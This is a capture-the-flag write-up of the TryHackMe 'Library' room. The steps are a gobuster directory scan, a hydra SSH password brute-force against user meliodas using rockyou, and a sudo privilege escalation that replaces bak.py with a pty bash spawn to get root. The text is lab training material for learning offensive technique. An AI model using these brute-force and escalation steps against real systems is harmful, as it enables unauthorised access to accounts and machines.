Library is a beginner level room in Tryhackme. The objective is to get the user and the root flag.
| Author | stuxnet |
| Description | boot2root machine for FIT and bsides guatemala CTF. |
Deploy the VM and lets go.
Enumeration
Let’s start with a nmap scan.
Only the ssh and http services are open. Let’s check the http service.
Use gobuster to bruteforce the hidden directories.
gobuster dir -u http://remote-ip-addr/ -w /usr/share/dirb/wordlists/common.txt -t 50 -x php,html,txt,js
Checked the robots.txt file but found nothing useful.
After looking around for a while, found the username meliodas in the homepage.
User flag
I used hydra to find the password for the user meliodas
hydra -l meliodas -P ~/Wordlists/rockyou.txt remote-ip-addr ssh
Let’s login to ssh using the credentials we just found
Boom!! We got the user flag. Let’s get going to the root flag.
Root flag
I used sudo -l to get the files that can run by root.
There is a file named bak.py which can be run as root…but wait it cannot be edited by the user meliodas.
So, let’s create a new file.
rm bak.py
touch bak.py
echo 'import pty;pty.spawn("/bin/bash")' > bak.py
sudo python /home/meliodas/bak.py
The root flag is in the /root directory.
That’s it folks. Happy hacking!!!